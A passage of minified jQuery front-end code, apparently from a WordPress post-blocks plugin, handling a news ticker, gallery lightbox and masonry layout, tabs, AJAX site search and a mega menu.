touchend",(function(){clearInterval(l)})),t(i.controls.toggle).on("click",(function(){o?(o=!1,clearInterval(u)):(o=!0,u=setInterval((function(){e<a&&"left"==r&&!p&&(a=-c),t(".ultp-newsTicker-wrap").outerWidth()<a&&"left"==r&&p&&(a=-(d+100)),e<a&&"right"==r&&!p&&(a=-d),d<a&&"right"==r&&p&&(a=-t(".ultp-newsTicker-wrap").outerWidth()),s.css(r,-a),a++}),n))})),i.pauseOnHover&&(s.on("mouseenter",(function(){clearInterval(u)})),s.on("mouseleave",(function(){o&&(u=setInterval((function(){e<a&&"left"===r&&!p&&(a=-t(".ultp-newsTicker-wrap").outerWidth()),t(".ultp-newsTicker-wrap").outerWidth()<a&&"left"===r&&p&&(a=-e),t(".ultp-newsTicker-wrap").outerWidth()<a&&"right"===r&&!p&&(a=-d),d<a&&"right"===r&&p&&(a=-e),s.css(r,-a),a++}),n))})))}function n(t){let e=s.find(".active").index();e<0&&(e=0);let i=1;"prev"==t&&(s.children().eq(e).removeClass("active"),s.children().eq(e-i).addClass("active")),"next"==t&&(s.children().eq(e).removeClass("active"),e==s.children().length-1&&(i=-(s.children().length-1)),s.children().eq(e+i).addClass("active"))}function a(){let t=1,e=s.find(".active").index();e<0&&(e=0),s.children().eq(e).removeClass("active"),e==s.children().length-1&&(t=-(s.children().length-1)),s.children().eq(e+t).addClass("active")}},t.fn.UltpSlider.defaults={type:"horizontal",autoplay:2e3,speed:50,direction:"up",pauseOnFocus:!0,pauseOnHover:!0,controls:{prev:"",next:"",toggle:""}}}(jQuery),function(t){"use strict";let e=0!=t(".wp-block-ultimate-post-gallery").length;t(".wp-block-ultimate-post-gallery").each((function(){const e=t(this);!function(e){const i=e.data("lightbox"),s=e.data("caption"),o=e.find(".ultp-gallery-item"),l=e.data("indicators"),n=e.find(".ultp-gallery-lightbox"),a=e.find(".ultp-gallery-loadMore"),r=e.find(".ultp-gallery-lightbox__zoom-in"),d=e.find(".ultp-gallery-lightbox__zoom-out"),c=e.find(".ultp-gallery-lightbox__close"),p=e.find(".ultp-gallery-lightbox__control"),u=e.find(".ultp-gallery-lightbox__full-screen"),h=e.find(".ultp-gallery-lightbox__indicator-control");let f=null,m=!0;t(document).on("click",(function(e){const i=t(e.target),s=t(".ultp-lightbox");i.closest(".ultp-gallery-lightbox__control, .ultp-lightbox__left-icon, .ultp-lightbox__right-icon, .ultp-lightbox__img-container, .ultp-lightbox-indicator__item-img").length>0||m||(s.hide(),p.hide(),m=!0),s.is(":visible")&&(m=!1)})),c.on("click",(function(){t(this).parent().parent(".ultp-gallery-wrapper").find(".ultp-lightbox").hide(),p.hide(),document.exitFullscreen?document.exitFullscreen().catch((t=>{console.error("Failed to exit fullscreen:",t)})):document.webkitExitFullscreen?document.webkitExitFullscreen():document.msExitFullscreen&&document.msExitFullscreen(),f=null}));let g=1;r.on("click",(function(){g+=.5;t(this).closest(".ultp-gallery-wrapper").find(".ultp-lightbox__inside img").css({transform:`scale(${g})`}),g>1?(t(".ultp-lightbox__caption").slideUp(300),t(".ultp-lightbox-indicator").slideUp(300)):t(".ultp-lightbox__caption").is(":visible")||t(".ultp-lightbox__caption").fadeIn(300)})),d.on("click",(function(){g-=.5;t(this).closest(".ultp-gallery-wrapper").find(".ultp-lightbox__inside img").css({transform:`scale(${g})`}),t(".ultp-lightbox__caption").is(":visible")||1!=g||t(".ultp-lightbox__caption").fadeIn(300),t(".ultp-lightbox-indicator").is(":visible")||1!=g||t(".ultp-lightbox-indicator").fadeIn(300)})),h.off("click").on("click",(function(e){e.stopPropagation();t(this).closest(".ultp-gallery-wrapper").find(".ultp-lightbox-indicator").slideToggle(300)})),u.on("click",(function(){const t=document.documentElement;document.fullscreenElement||document.webkitFullscreenElement||document.msFullscreenElement?document.exitFullscreen?document.exitFullscreen().catch((t=>{console.error("Failed to exit fullscreen:",t)})):document.webkitExitFullscreen?document.webkitExitFullscreen():document.msExitFullscreen&&document.msExitFullscreen():t.webkitRequestFullscreen?t.webkitRequestFullscreen():t.msRequestFullscreen&&t.msRequestFullscreen()})),i&&n.each((function(){t(this).off().on("click",(function(e){e.stopPropagation();const i=t(this);m=!1;const o=i.data("id"),n=i.data("index"),a=i.data("img"),r=i.closest(".ultp-gallery-item").data("caption"),d=i.parent().parent();w(i,o,n,a,r,d,s,l)}))})),t(document).on("click",".ultp-lightbox__right-icon, .ultp-lightbox__left-icon",(function(){const e=t(this),i=e.hasClass("ultp-lightbox__right-icon"),s=e.closest(".ultp-lightbox"),o=e.closest(".ultp-gallery-container"),l=s.find(".ultp-lightbox-indicator"),n=s.find(".ultp-lightbox__img"),a=s.find(".ultp-lightbox__caption"),r=o.children(),d=s.data("index");null==f&&(f=d),f=i?(f+1)%r.length:(f-1+r.length)%r.length;const c=r.eq(f),p=c.find(".ultp-gallery-media img").attr("src"),u=c.data("id"),h=c.data("caption");n.fadeOut(200,(function(){n.attr("src",p).fadeIn(200)})),a.fadeOut(200,(function(){a.text(h).fadeIn(200)}));const m=l.children().eq(f);m.addClass("lightbox-active").siblings().removeClass("lightbox-active"),m.data("id")!==u&&m.removeClass("lightbox-active")})),t(document).on("click",".ultp-lightbox-indicator__item",(function(){const e=t(this),i=e.find("img").attr("src"),s=e.closest(".ultp-lightbox").find(".ultp-lightbox__img");f=e.data("index"),s.fadeOut(200,(function(){s.attr("src",i).fadeIn(200)})),e.addClass("lightbox-active").siblings().removeClass("lightbox-active")})),i&&!(n.length>0)&&o.off().on("click",(function(e){const i=t(e.target).closest("svg").parent().is(".ultp-gallery-action a");if(!o.find(".ultp-lightbox").is(":visible")&&!i){const e=t(this);f=e.data("index");const i=e.data("id"),o=e.data("caption"),n=e.data("index"),a=e.find(".ultp-gallery-media img").attr("src"),r=e.find(".ultp-gallery-action-container");w(e,i,n,a,o,r,s,l)}}));const v=a[0]?Number(getComputedStyle(a[0]).getPropertyValue("--ultp-gallery-count").trim()):"";let b=v;a?.length>0&&o.each((function(e){v<e+1&&(t(this).find("img").attr({width:t(this).find("img").width(),height:t(this).find("img").height()}),t(this).css({display:"none"}))}));o.length<=b&&a.css({display:"none"});function w(e,i,s,l,n,a,r,d){p.css({display:"flex"}),t(".ultp-lightbox").remove();const c=o.map((function(e){const s=t(this).find("img").attr("src"),o=t(this).data("caption");return i==t(this).data("id")&&(f=e),console.log(s,"imgSrc"),`<div  data-index=${e} class="${i==t(this).data("id")?"ultp-lightbox-indicator__item lightbox-active":"ultp-lightbox-indicator__item"}" data-id=${t(this).data("id")} data-caption=${o}><img class="ultp-lightbox-indicator__item-img" src="${s}" /></div>`})).get().join(""),u=`<div class="ultp-lightbox" data-id=${i} data-index=${s}>\n                        <div class="ultp-lightbox__container">\n                            <div class="ultp-lightbox__inside">\n                                <div class="ultp-lightbox__left-icon"><svg  fill="currentColor"xmlns="http://www.w3.org/2000/svg" viewBox="0 0 49.16 37.25"><path  stroke-miterlimit="10" d="M18.157 36.154 2.183 20.179l-.053-.053-1.423-1.423 17.45-17.449a2.05 2.05 0 0 1 2.9 2.9l-12.503 12.5h38.053a2.05 2.05 0 1 1 0 4.1H8.555l12.5 12.5a2.05 2.05 0 1 1-2.9 2.9Z"></path></svg></div>\n                                <div class="ultp-lightbox__img-container">\n                                    <img class="ultp-lightbox__img" src="${l}" />\n                                    ${r?`<span class="ultp-lightbox__caption">${n}</span>`:""}\n                                </div>\n                                <div class="ultp-lightbox__right-icon"><svg fill="currentColor" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 49.16 37.25"><path  stroke-miterlimit="10" d="M28.1 36.154a2.048 2.048 0 0 1 0-2.9l12.5-12.5H2.55a2.05 2.05 0 1 1 0-4.1H40.6l-12.5-12.5a2.05 2.05 0 1 1 2.9-2.9l17.45 17.448L31 36.154a2.047 2.047 0 0 1-2.9 0Z"></path></svg></div>\n                            </div>\n                            ${d?`<div class="ultp-lightbox-indicator">${c}</div>`:""}\n                        </div>\n                    </div>`;a.append(u)}}(e),i(e)}));function i(e){const i=e;let s=i.find(".ultp-gallery-loader"),o=i.find(".ultp-no-gallery-message");const l=i.find(".ultp-gallery-container"),n=i.find(".ultp-gallery-filter__item"),a=i.find(".ultp-gallery-loadMore"),r=i.find(".ultp-gallery-container.ultp-gallery-tiled"),d=i.find(".ultp-gallery-container.ultp-gallery-masonry"),c=l[0]?Number(getComputedStyle(l[0]).getPropertyValue("--ultp-gallery-columns").trim()):3,p=l[0]?Number(getComputedStyle(l[0]).getPropertyValue("--ultp-gallery-gap").trim()):10,u=l.find(".ultp-gallery-item"),h=a[0]?Number(getComputedStyle(a[0]).getPropertyValue("--ultp-gallery-count").trim()):0;let f=h;if(0===s.length&&(d?.length||r?.length)&&(l.css({height:"250px",overflow:"hidden"}),s=t('<div class="ultp-gallery-loader" style="display:none;position:absolute;top:0;left:0;right:0;bottom:0;background:rgb(255 255 255 / 92%);z-index:9; display: flex; align-items:center;justify-content:center;">\n                    <div class="spinner" style="border: 4px solid #f3f3f3;border-top: 4px solid #037FFF;border-radius: 50%;width: 30px;height: 30px;animation: spin 0.8s linear infinite;"></div>\n                            </div>'),i.css("position","relative"),l.append(s)),!document.getElementById("ultp-spinner-style")){const y='<style id="ultp-spinner-style">\n                    @keyframes spin {\n                        0% { transform: rotate(0deg); }\n                        100% { transform: rotate(360deg); }\n                    }\n                </style>';t("head").append(y)}s.fadeIn(150),0===o.length&&(o=t('<div class="ultp-no-gallery-message">No gallery item found</div>'),l.after(o));let m=function(){};function g(){if(0===r.length)return;const e=r.find(".ultp-gallery-item:visible");r.css("visibility","hidden"),e.each((function(){t(this).css({top:"",left:"",width:"",height:"",position:""})})),requestAnimationFrame((()=>{m(e),r.css("visibility","visible")}))}function v(){if(0===d.length)return;const e=(d.width()-(c-1)*p)/c,i=d.find(".ultp-gallery-item:visible");let s=new Array(c).fill(0);i.each((function(){const i=t(this);i.css({width:e+"px",position:"absolute"});const o=s.indexOf(Math.min(...s)),l=s[o],n=o*(e+p);i.stop().animate({top:`${l}px`,left:`${n}px`},300),s[o]+=i.outerHeight(!0)+p})),d.css("height",Math.max(...s)+"px")}function b(e,i){let s=0,l=0;return u.each((function(){const o=t(this),n=o.data("tag")||"";"All"===e||n.includes(e)?(l++,s<i?(o.css({display:"block"}),s++):o.css({display:"none"})):o.css({display:"none"})})),o.toggle(0===l),{visibleCount:s,totalMatch:l}}function w(t){s.fadeIn(150),setTimeout((()=>{t(),s.fadeOut(150)}),400)}if(n.on("click",(function(){const e=t(this),i=e.text();e.siblings().removeClass("active-gallery-filter"),e.addClass("active-gallery-filter"),f=h,w((()=>{const{visibleCount:t,totalMatch:e}=b(i,f);a.css({display:t<e?"block":"none"}),g(),v()}))})),a.on("click",(function(e){e.preventDefault();const s=i.find(".active-gallery-filter").text()||"All";let l=0,n=0;u.each((function(){const e=t(this),i=e.data("tag")||"";("All"===s||i.includes(s))&&(n++,e.is(":visible")&&l++)}));const r=l%c;let d=0!==r?c-r:c;f=Math.min(l+d,n),w((()=>{let e=0;u.each((function(){const i=t(this),o=i.data("tag")||"";"All"===s||o.includes(s)?(i.css({display:e<f?"block":"none"}),e++):i.css({display:"none"})})),f>=n&&a.css({display:"none"}),o.toggle(0===n),g(),v()}))})),r.length){const k=Number(getComputedStyle(l[0]).getPropertyValue("--ultp-gallery-height").trim())||300;function x(t){const e=t[0];return(e.naturalWidth||e.width||1)/(e.naturalHeight||e.height||1)}m=function(e){const i=r,s=i.width()||i.closest(".ultp-tab-content").width();let o=0;const l=[];let n=[],a=0;e.each((function(){const e=t(this),i=x(e.find("img"));n.push({$item:e,ratio:i}),a+=i,n.length===c&&(l.push({cells:n,ratioSum:a}),n=[],a=0)})),n.length&&l.push({cells:n,ratioSum:a}),l.forEach((t=>{const e=p*(t.cells.length-1),i=s-e;let l=0;t.cells.forEach((({$item:e,ratio:s},n)=>{const a=i*(s/t.ratioSum);e.css({position:"absolute",top:o,left:l,width:a,height:k}),l+=a+p})),o+=k+p})),i.height(o-p)}}setTimeout((()=>{const t=i.find(".ultp-gallery-filter__item.active-gallery-filter").text()||"All",{visibleCount:e,totalMatch:l}=b(t,f);a.css({display:e<l?"block":"none"}),o.toggle(0===l),g(),v(),s.fadeOut(50)}),500)}0==t("body.postx-admin-page").length&&e&&t(window).on("load resize",(function(){t(".wp-block-ultimate-post-gallery").each((function(){i(t(this))}))}))}(jQuery),function(t){function e(){const e=t=>t.closest(".wp-block-ultimate-post-tabs");t(".wp-block-ultimate-post-tabs").each((function(){let i=t(this);const s=i.data("responsive"),o=i.find(".ultp-tabs-nav").first(),l=i.find(".ultp-tab-content").first().children(".wp-block-ultimate-post-tab-item"),n=i.children().children(".ultp-nav-right").length>0||i.children().children(".ultp-nav-left").length>0;i.parent(".wp-block-ultimate-post-tab-item").length>0&&i.closest(".ultp-tab-content").css({overflow:"hidden"}),"slider"==s&&i.width()<600&&i.find(".ultp-tabs-nav").css({flexWrap:"nowrap"}),i.width()<600&&"accordion"==i.data("responsive")&&!i.hasClass(".ultp-tab-accordion-active")&&(i.addClass("ultp-tab-accordion-active"),i.find(".ultp-tabs-nav-element").each((function(e){t(this).data("order")&&t(this).css({order:2*(e+1)-1})})),l.each((function(e){t(this).css({order:2*(e+1)})}))),i.hasClass("ultp-tab-accordion-active")&&(o.css("display","contents").parent().css("display","contents"),l.addClass("ultp-tab-content").parent().css("display","contents")),l.each((function(i){e(t(this)).data("activetab")==t(this).data("tabindex")&&t(this).addClass("active")}));const a=i.find(".ultp-tabs-nav-wrapper"),r=i.find(".ultp-tab-left-arrow").first(),d=i.find(".ultp-tab-right-arrow").first(),c="autoplay"==i.data("tabevent")?"click":i.data("tabevent");let p="slider"==s||i.find(".ultp-tab-wrapper").hasClass("ultp-nav-left")||i.find(".ultp-tab-wrapper").hasClass("ultp-nav-right"),u=n?o.height():o.width(),h=u/o?.children().length,f=n?a.height():a.width(),m=0,g=h;function v(){0==m&&d.addClass("ultp-arrow-active"),d.off("click").on("click",(function(e){e.stopPropagation();const i=n?t(this).closest(".ultp-tabs-nav-wrapper").height():t(this).closest(".ultp-tabs-nav-wrapper").width(),s=n?t(this).siblings().find(".ultp-tabs-nav").height():t(this).siblings().find(".ultp-tabs-nav").width(),o=s-i,l=s/t(this).siblings().find(".ultp-tabs-nav")?.children().length;o>m&&o-m>l&&(m+=l),o-m<l+1&&(m+=o-m,t(this).removeClass("ultp-arrow-active")),m>0&&t(this).siblings(".ultp-tab-left-arrow").addClass("ultp-arrow-active");let a=n?`translate(0px, -${m}px)`:`translate(-${m}px, 0px)`;t(this).siblings().find(".ultp-tabs-nav").css({transform:a})})),r.off("click").on("click",(function(e){const i=(n?t(this).siblings().find(".ultp-tabs-nav").height():t(this).siblings().find(".ultp-tabs-nav").width())/t(this).siblings().find(".ultp-tabs-nav")?.children().length;m>i?m-=i:m=0,m>0?t(this).siblings(".ultp-tab-right-arrow").addClass("ultp-arrow-active"):t(this).removeClass("ultp-arrow-active");let s=n?`translate(0px, -${m}px)`:`translate(-${m}px, 0px)`;t(this).siblings().find(".ultp-tabs-nav").css({transform:s})}))}function b(e,i,o){if(!(e.parent(".wp-block-ultimate-post-tab-item").length>0)||e.parent(".wp-block-ultimate-post-tab-item").hasClass("active")){u=n?o.height():o.width(),h=u/o?.children().length,f=n?a.height():a.width();const e=o.find(".ultp-tabs-nav-element");if(g+=h,k*h<f&&(o.css({transform:"translate(0px, 0px)"}),"slider"==s&&(d.addClass("ultp-arrow-active"),r.removeClass("ultp-arrow-active"))),k*h>f){p&&(r.addClass("ultp-arrow-active"),d.addClass("ultp-arrow-active"));let t=n?`translate(0px, ${f-k*h}px)`:`translate(${f-k*h}px, 0px)`;o.css({transform:t})}const l=e.parent().children().length;e.each((function(e){w&&t(this).removeClass("tab-progressbar-active"),e+1==k?(t(this).addClass("ultp-tab-active"),w&&t(this).addClass("tab-progressbar-active")):t(this).removeClass("ultp-tab-active")})),i.each((function(e){t(this).each((function(){e+1==k?t(this).addClass("active"):t(this).removeClass("active")}))})),l==k&&(d.removeClass("ultp-arrow-active"),k=0),k++}}t(".ultp-tabs-nav-element").off(c).on(c,(function(i){i.stopPropagation;const s=t(this);s.addClass("ultp-tab-active").siblings().removeClass("ultp-tab-active"),e(t(this)).find(".wp-block-ultimate-post-tab-item").each((function(){t(this).removeClass("active"),t(this).data("tabindex")==s.data("tabindex")&&t(this).addClass("active")})),u=n?o.height():o.width(),h=u/o?.children().length,f=n?a.height():a.width(),u>f&&p&&v()})),u>f&&p&&v();const w=i.data("progressbar"),y=1e3*t(this).data("duration");let k=e(t(this)).data("activetab")-1||1;if("autoplay"==t(this).data("tabevent")){let t=setInterval((()=>b(i,l,o)),y);i.on("mouseleave",(function(){t=setInterval((()=>b(i,l,o)),y)})),i.on("mouseenter",(function(){clearInterval(t)}))}}))}e(),t(window).on("resize",(function(){e()}))}(jQuery),function(t){t(".wp-block-ultimate-post-advanced-search")?.length&&function(){let e=1;t(document).on("click",".ultp-search-clear",(function(){e=1;const i=t(this).data("blockid");t(this).parents(".ultp-search-inputwrap").find(".ultp-searchres-input").val(""),t(this).removeClass("active"),t(`.ultp-block-${i}`).find(".ultp-result-data").html(""),t(`.ultp-block-${i}`).find(".ultp-search-noresult, .ultp-viewall-results, .ultp-result-loader").removeClass("active")})),t(document).on("click",".ultp-popupclose-icon",(function(){t(this).parents(".result-data").removeClass("popup-active")})),t(document).on("click",".ultp-searchpopup-icon",(function(){const e=t(this).parents(".ultp-search-frontend"),i=e.data("blockid");s(e,!t(`.result-data.ultp-block-${i}`).length),t(`.result-data.ultp-block-${i}`).toggleClass("popup-active")})),t(".ultp-searchres-input").val().length>2&&t(".ultp-searchres-input").closest(".ultp-search-inputwrap").find(".ultp-search-clear").addClass("active");t(document).on("input",".ultp-searchres-input",(function(e){i(t(this),e.target.value)}));const i=(i,o,l="",n=!0)=>{l=l||i.parents(".ultp-search-inputwrap").find(".ultp-search-clear").data("blockid");const a=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${l}`).find(".ultp-search-frontend"),r=t(`.result-data.ultp-block-${l}`);s(a,!r.length),o.length>2?a.data("ajax")&&(r.find(".ultp-search-result").addClass("ultp-search-show"),r.find(".ultp-result-loader").addClass("active"),r.addClass("popup-active"),wp.apiFetch({path:"/ultp/ultp_search_data",method:"POST",data:{searchText:o,date:parseInt(a.data("date")),image:parseInt(a.data("image")),author:parseInt(a.data("author")),excerpt:parseInt(a.data("excerpt")),category:parseInt(a.data("catenable")),excerptLimit:parseInt(a.data("excerptlimit")),postPerPage:a.data("allresult")?a.data("postno"):10,exclude:"string"!=typeof a.data("searchposttype")&&a.data("searchposttype").length>0&&a.data("searchposttype"),paged:e,wpnonce:ultp_data_frontend.security}}).then((e=>{if(e.post_data){n?(r.find(".ultp-search-result").addClass("ultp-search-show"),r.find(".ultp-result-data").addClass("ultp-result-show"),r.find(".ultp-result-data").html(e.post_data)):(r.find(".ultp-search-result").addClass("ultp-search-show"),r.find(".ultp-result-data").addClass("ultp-result-show"),r.find(".ultp-result-data").append(e.post_data).fadeIn(500,(function(){t(this).animate({scrollTop:t(this).prop("scrollHeight")},400)}))),r.find(".ultp-search-noresult, .ultp-result-loader").removeClass("active");const i=r.find(".ultp-result-data .ultp-search-result__item").length;r.find(".ultp-viewall-results").addClass("active").find("span").text(`(${e.post_count-i})`)}else r.find(".ultp-result-data").removeClass("ultp-result-show"),r.find(".ultp-result-data").html(""),r.find(".ultp-search-noresult").addClass("active"),r.find(".ultp-result-loader, .ultp-viewall-results").removeClass("active");if(a.data("allresult")){const t=r.find(".ultp-result-data .ultp-search-result__item").length;e.post_count&&e.post_count>t?r.find(".ultp-viewall-results").addClass("active").find("span").text(`(${e.post_count-t})`):r.find(".ultp-viewall-results").removeClass("active")}}))):(r.find(".ultp-search-result").removeClass("ultp-search-show"),r.find(".ultp-result-data").removeClass("ultp-result-show"),r.find(".ultp-search-noresult").removeClass("active")),o.length<3?(e=1,r.find(".ultp-result-data").html(""),r.find(".ultp-viewall-results").removeClass("active"),r.find(".ultp-search-noresult").removeClass("active"),a.find(".ultp-search-clear").removeClass("active"),t(`.result-data.ultp-block-${l}`).find(".ultp-search-clear").removeClass("active")):(a.find(".ultp-search-clear").addClass("active"),t(`.result-data.ultp-block-${l}`).find(".ultp-search-clear").addClass("active"))};t(document).on("click",".ultp-viewall-results",(function(s){e++;const o=t(this).closest(".result-data").data("blockid");i(t(this),t(`.ultp-block-${o} .ultp-searchres-input`).val(),o,!1)})),t(".wp-block-ultimate-post-advanced-search").length>0&&t(document).on("click",(function(e){t(e.target).closest(".ultp-searchpopup-icon").length||t(e.target).closest(".ultp-searchres-input").length||t(e.target).closest(".result-data.popup-active").length||t(".result-data").removeClass("popup-active"),t(e.target).closest(".ultp-search-frontend").length||t(e.target).closest(".result-data.popup-active").length||t(".result-data").removeClass("popup-active")}));t(document).on("keyup",".ultp-searchres-input",(function(e){const i=t(this).closest(".ultp-search-inputwrap").find(".ultp-search-clear").data("blockid"),s=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend").data("gosearch");let o="_self";if(t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend").data("enablenewtab")&&(o="_blank"),s&&"Enter"==e.key&&t(this).val().length>2){const e=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend");let s="string"!=typeof e.data("searchposttype")&&e.data("searchposttype")?.length>0&&e?.data("searchposttype");s=s.length?`&ultp_exclude=${JSON.stringify(s.map((t=>t.value)))}`:"",window.open(`${ultp_data_frontend.home_url}/?s=${t(this).val()}${s}`,o)}})),t(document).on("click",".ultp-search-button",(function(e){const i=t(this).closest(".ultp-searchform-content").find(".ultp-search-clear").data("blockid"),s=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend").data("gosearch");let o="_self";if(t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend").data("enablenewtab")&&(o="_blank"),s){const e=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend");let s="string"!=typeof e.data("searchposttype")&&e.data("searchposttype")?.length>0&&e?.data("searchposttype");s=s.length?`&ultp_exclude=${JSON.stringify(s.map((t=>t.value)))}`:"",window.open(`${ultp_data_frontend.home_url}/?s=${t(this).closest(".ultp-searchform-content").find(".ultp-searchres-input").val()}${s}`,o)}else t(`.result-data.ultp-block-${i}`).addClass("popup-active")})),t(document).on("click",".ultp-searchres-input",(function(e){const i=t(this).closest(".ultp-searchform-content").find(".ultp-search-clear").data("blockid");t(".result-data").removeClass("popup-active"),t(`.result-data.ultp-block-${i}`).addClass("popup-active")})),t(window).on("resize",(function(){t(".ultp-search-result").length>0&&t(".ultp-search-frontend").each((function(e){s(t(e))}))}));const s=(e,i=!1)=>{const s=e.data("blockid"),o=e.data("popuptype"),l=e.data("popupposition");if(i){const i=e.data("allresult"),n=`<div class="ultp-search-result" data-image=${e.data("image")||!1} data-author=${e.data("author")||!1} data-date=${e.data("date")||!1} data-excerpt=${e.data("excerpt")||!1} data-excerptlimit=${e.data("excerptlimit")} data-allresult=${i||!1} data-catenable=${e.data("catenable")||!1} data-postno=${e.data("postno")||!1} data-gosearch=${e.data("gosearch")||!1} data-popupposition=${l||!1}>\n                    <div class="ultp-result-data"></div>\n                    <div class="ultp-search-result__item ultp-search-noresult">${e.data("noresultext")}</div>\n                    <div class="ultp-search-result__item ultp-result-loader"></div>\n                    ${i?`<div class="ultp-viewall-results ultp-search-result__item">${e.data("viewmoretext")}<span></span></div><div class="ultp-search-result__item ultp-viewmore-loader"></div>`:""}\n                    </div>`;if(o){const i=t(`.ultp-block-${s}`).find(".ultp-search-canvas").detach();t("body").append(`<div class="result-data ultp-block-${s} ultp-search-animation-${o}" data-blockid=${s}><div class="ultp-search-canvas">${i.html()+(e.data("ajax")?n:"")}</div></div>`)}else t("body").append(`<div class="result-data ultp-block-${s}" data-blockid=${s}>${n}</div>`)}let n="";if(!o){n=e.find(".ultp-searchform-content");const i=n.offset();return t(`body > .ultp-block-${s}`).css({width:`${n.width()}px`,top:`${i?.top+n.height()}px`,left:`${i?.left}px`})}if("popup"==o){n=e.find(".ultp-searchpopup-icon");const i=n.offset(),o="right"==l?i?.left>t(`body > .ultp-block-${s}`).width():t(document).width()-i?.left>t(`body > .ultp-block-${s}`).width();let a="",r="";return"right"==l?(a=o?t(document).width()-i?.left-n.outerWidth()+"px":"unset",r=o?"auto":i?.left+("right"==l?10:0)+"px"):(a=o?"unset":t(document).width()-i?.left-n.outerWidth()+"px",r=o?i?.left+("right"==l?10:0)+"px":"auto"),t(`body > .ultp-block-${s}`).css({top:`${i?.top+n.outerHeight()}px`,right:a,left:r})}}}()}(jQuery),function(t){function e(e){if(t(".editor-styles-wrapper")?.length)return;const i=t(".wp-block-ultimate-post-menu-item.hasMegaMenuChild > .ultp-menu-item-wrapper > .ultp-menu-item-content");i.length>0&&i.each((function(){if(t(this).hasClass("ultpMegaWindowWidth")){const e=t("body")?.width()||1200,i=t("body")?.offset()?.left||0;t(this)?.offset();t(this).find(" > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper").css({maxWidth:`${e}px`,boxSizing:"border-box"});const s=t(this).siblings(".ultp-menu-item-label-container")?.offset()?.left||0;t(this).css({left:i-s+"px"})}else if(t(this).hasClass("ultpMegaMenuWidth")){const e=t(this).closest(".wp-block-ultimate-post-menu")?.width()||800,i=t(this).closest(".wp-block-ultimate-post-menu")?.offset()?.left||0,s=t(this)?.offset()?.left||0;t(this).find(" > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper").css({maxWidth:`${e}px`,boxSizing:"border-box"}),t(this).css({left:i-s+"px"});const o=t(this).siblings(".ultp-menu-item-label-container")?.offset()?.left||0;t(this).css({left:i-o+"px"})}else t(this).find(" > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper").css({maxWidth:"",boxSizing:""}),t(this).css({left:""})}))}setTimeout((()=>{e("setTimeout")}),10),e("normal");const i=0==t("body.postx-admin-page").length;i&&t(window).on("resize",(function(){e()}));let s,o,l,n,a,r,d,c,p,u="",h=[],f=[];function m(e,i=""){if("close"==i)t(l).find("> .ultp-mobile-view-container > .ultp-mobile-view-wrapper").css({transform:"translateX(-100%)",visibility:"hidden",opacity:"0"}),setTimeout((()=>{t(l).hasClass("ultpMenu__Css")&&(t(l).addClass("ultpMenuCss"),t(l).removeClass("ultpMenu__Css")),t(l).removeClass("ultp-mobile-menu"),t(l).find("> .ultp-mobile-view-container").removeClass("ultp-mv-active"),t(l).find("> .ultp-mobile-view-container > .ultp-mobile-view-wrapper").css({transform:"",visibility:"",opacity:"","transition-property":"","transition-timing-function":"","transition-duration":""}),s?.html(""),u="",h=[],s="",o="",l="",n="",a="",c=0,p="",f=[]}),c);else{const i=t(e.target);c=t(i).hasClass("ultp-mv-ham-icon")?t(i).data("animationduration"):i.closest(".ultp-mv-ham-icon").data("animationduration"),c=c||100,p=t(i).hasClass("ultp-mv-ham-icon")?t(i).data("headtext"):i.closest(".ultp-mv-ham-icon").data("headtext"),r=i.closest(".wp-block-ultimate-post-menu").find("> .ultp-mobile-view-container > .ultp-mv-icons > .ultp-mv-label-icon svg").prop("outerHTML"),d=i.closest(".wp-block-ultimate-post-menu").find("> .ultp-mobile-view-container > .ultp-mv-icons > .ultp-mv-label-icon-expand svg").prop("outerHTML"),l=i.closest(".wp-block-ultimate-post-menu");const s=t(l);t(l).hasClass("ultpMenuCss")&&(t(l).removeClass("ultpMenuCss"),t(l).addClass("ultpMenu__Css")),u="ultp-block-"+s.data("bid"),s.addClass("ultp-mobile-menu"),s.find("> .ultp-mobile-view-container").addClass("ultp-mv-active"),v("","hamIcon"),s.find("> .ultp-mobile-view-container > .ultp-mobile-view-wrapper").css({"transition-property":"opacity, visibility, transform","transition-timing-function":"ease-in","transition-duration":c?c/1e3+"s":".25s"})}}function g(t){const e=t?._replace||r;let i=t?._string;return i&&f.length&&f.forEach((t=>{t&&e&&(i=i.replace(t,e))})),i}function v(e,i){if("hamIcon"==i){n=l.data("rcsstype"),a=l.data("rstr"),s=t(l).find("> .ultp-mobile-view-container .ultp-mobile-view-body"),o=t(l).find("> .ultp-mobile-view-container .ultp-mv-back-label");let e=t(l).find("> .ultp-menu-wrapper > .ultp-menu-content").html();if(t(l).find(".ultp-menu-item-dropdown").toArray().forEach((e=>{t(e).html()&&f.push(t(e).html())})),e){let i=t("<div>").html(e);i.find(".wp-block-ultimate-post-menu").addClass("ultp-mobile-menu"),e=i.html(),e=g({type:"hamicon",_string:e}),s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e),o.html(p)}}else if("next"==i){const i=t(e.target).closest(".wp-block-ultimate-post-menu-item"),r=i.data("bid");if(!h.includes("ultp-block-"+r)){let e="",d="";if(i.hasClass("hasListMenuChild")?(d=i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-list-menu").css("display"),e=i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-list-menu > .ultp-list-menu-wrapper > .ultp-list-menu-content").html()):(d=i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-mega-menu").css("display"),e=i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").html()),"none"==d)return;if(e){t(l).find(".ultp-mv-back-label-con").removeClass("ultpmenu-dnone");let d=t("<div>").html(e);d.find(".wp-block-ultimate-post-menu").addClass("ultp-mobile-menu"),e=d.html(),h.push(u),u="ultp-block-"+r,o.html(i.find("> .ultp-menu-item-wrapper > 